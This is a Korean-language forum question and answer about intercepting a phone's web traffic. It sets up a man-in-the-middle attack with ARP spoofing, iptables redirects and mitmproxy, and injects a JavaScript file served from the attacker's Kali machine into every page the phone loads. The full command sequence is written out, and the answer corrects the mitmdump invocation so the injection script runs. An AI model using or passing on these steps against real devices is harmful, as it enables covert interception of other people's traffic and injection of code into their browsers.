ARPspoof 설정을 사용하여 휴대폰의 트래픽을 가로채서 페이지에 자바스크립트 헤더를 삽입하려고 합니다.
시작하기 전에 다음 명령을 입력했습니다.
echo 1 > /proc/sys/net/ipv4/ip_forward
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
sudo iptables -A FORWARD -i wlan0 -o eth1 -j ACCEPT
sudo iptables -A FORWARD -i eth1 -o wlan0 -j ACCEPT
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-port 8080
트래픽을 가로채기 위해 다음 명령을 입력했습니다.
sudo arpspoof -i wlan0 -t <phone_ip_here> <router_ip_here>
sudo arpspoof -i wlan0 -t <router_ip_here> <phone_ip_here>
전화기가 수신하는 모든 웹 페이지에 포함될 자바스크립트 파일을 배포하기 위해 웹 서버를 시작했습니다.
웹 서버는 Kali 시스템의 IP 포트 8000에서 호스팅됩니다.
sudo python3 httpServer.py
마지막으로 mitmdump를 실행하면 다음 오류가 발생합니다.
mitmdump -s 'injector.py http://<kali_computer_ip>:8000/script.js'
에러 메시지:
/usr/bin/mitmdump: No such script
다음을 사용하여 mitmproxy를 실행하면 내가 뭘 잘못하고 있는지 잘 모르겠습니다.
mitmproxy -p 8080
트래픽이 mitmproxy로 라우팅되지만 모바일 브라우저에서 400 Bad Request 오류가 발생하고 mitmproxy가 http 프로토콜 오류를 반환합니다.
어떤 도움이나 조언이라도 따뜻하게 환영합니다.
답변1
mitmdump -s 'injector.py http://<kali_computer_ip>:8000/script.js'
작은따옴표에 세심한 주의를 기울이세요. mitmdump 옵션은 -s실행할 스크립트의 이름을 지정합니다. 여기서는 컴퓨터에 스크립트 이름을 효과적으로 알릴 수 있습니다.
injector.py<space>http://<kali_computer_ip>:8000/script.js
파일 이름 injector.py에는 특수 문자가 없으므로 따옴표로 묶을 필요가 없습니다. 반면, URL에 물음표나 셸에 특별한 의미가 있는 기타 문자가 포함되어 있으면 인용이 필요할 수 있습니다. 따라서 이 명령을 실행하는 현재 디렉터리에 있다고 가정하면 injector.py다음과 같이 원하는 작업이 수행될 수 있습니다.
mitmdump -s injector.py 'http://<kali_computer_ip>:8000/script.js'